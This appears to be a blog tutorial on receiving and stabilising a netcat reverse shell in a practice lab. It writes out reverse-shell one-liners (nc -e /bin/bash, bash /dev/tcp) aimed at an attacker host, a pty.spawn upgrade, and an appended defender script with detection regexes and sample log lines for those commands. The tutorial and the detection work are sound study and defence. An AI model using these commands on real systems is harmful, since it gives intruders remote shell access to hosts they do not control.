Netcat Shell Stabilization

ice-wzl
5 min read · Jul 24, 2021

Considering all the hard work it takes to receive a reverse shell from a target, it is imperative that we work to stabilize the shell as soon as possible.

This is a multi-part process that will yield you access to text editors, the ability to interact with programs on the host, and full visibility into stderr.

First, we log into our attack box (ice-wzl@kali) and our target box (shell@linux-shell-practice).

Now let's start our listener on our attack box first:

nc -nlvp 1234

Next, we will execute this command on the target box:

nc attack-box-ip port -e /bin/bash

Note: The -e /bin/bash option will not work on every host; it depends on which version of netcat is installed. Alternatively, you can use this command to receive a bash reverse shell:

bash -i >& /dev/tcp/attack-box-ip/port 0>&1

The picture below shows both commands working for this host:

Note: the & in the nc command backgrounds the command to allow me to show the second option in action without having to re-ssh.

Notice how the bash reverse shell (bottom right side) provided a more stable shell right off the bat versus the netcat reverse shell in the top right. After receiving a callback with netcat, it is always a good idea to issue a command like whoami or id to confirm that you received a shell and not just a connection with no shell access.

Let's stabilize. Getting a fully functional and stable shell is a multi-part process. Issue these commands in order to avoid any potential errors.

Step 1: Python

python -c 'import pty;pty.spawn("/bin/bash");'

python3 -c 'import pty;pty.spawn("/bin/bash");'

Either of these commands takes the first step in shell stabilization, as you can see below. Note that the version of Python installed on the target determines which command you run. I always like to check before I execute commands.
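
From the defender's side, the three command lines shown so far (nc with -e, the bash /dev/tcp redirect, and the Python pty.spawn upgrade) leave recognizable traces in process-execution logs. The following is an added example, not part of the original post: it matches them in a constructed log and pairs each reverse shell with a PTY upgrade that follows on the same host. The log format, timestamps, PIDs, 192.0.2.x addresses and function names are assumptions made for illustration.

```python
import re
from datetime import datetime, timedelta

# Patterns for the three command lines shown on this page.
RULES = {
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-\w*e\s+\S+"),
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "pty_spawn": re.compile(r"\bpython[\d.]*\s.*\bpty\.spawn\s*\("),
}
LINE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) pid=(?P<pid>\d+) user=\S+ cmd=(?P<cmd>.*)$")

# Constructed sample log (hypothetical format; 192.0.2.0/24 is a documentation range).
# Redirections such as ">& /dev/tcp/..." reach process arguments only when the
# command is passed as a string (bash -c '...'); typed interactively they are
# handled by the shell and show up only in shell history.
SAMPLE_LOG = """\
2021-07-24T10:01:02Z linux-shell-practice pid=4101 user=shell cmd=nc 192.0.2.10 1234 -e /bin/bash
2021-07-24T10:01:40Z linux-shell-practice pid=4120 user=shell cmd=bash -c 'bash -i >& /dev/tcp/192.0.2.10/1234 0>&1'
2021-07-24T10:02:05Z linux-shell-practice pid=4133 user=shell cmd=python3 -c 'import pty;pty.spawn("/bin/bash");'
2021-07-24T10:03:11Z linux-shell-practice pid=4150 user=shell cmd=nc -zv 192.0.2.20 22
2021-07-24T10:04:00Z linux-shell-practice pid=4161 user=shell cmd=python3 manage.py runserver
"""

def match_events(log_text):
    """Return one dict per (log line, rule) match, in log order."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        for name, rx in RULES.items():
            if rx.search(m["cmd"]):
                events.append({"ts": ts, "host": m["host"], "pid": int(m["pid"]), "rule": name})
    return events

def stabilization_sequences(events, window=timedelta(minutes=5)):
    """Pair each reverse-shell event with a later pty_spawn on the same host."""
    shells = [e for e in events if e["rule"] != "pty_spawn"]
    spawns = [e for e in events if e["rule"] == "pty_spawn"]
    return [(s["pid"], p["pid"]) for s in shells for p in spawns
            if s["host"] == p["host"] and timedelta(0) <= p["ts"] - s["ts"] <= window]

if __name__ == "__main__":
    evs = match_events(SAMPLE_LOG)
    for e in evs:
        print(e["ts"].isoformat(), e["host"], e["pid"], e["rule"])
    print("reverse shell followed by PTY upgrade:", stabilization_sequences(evs))
```

The plain listener (nc -nlvp 1234) and the port check (nc -zv) are deliberately not matched, since neither hands a shell to the connection.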
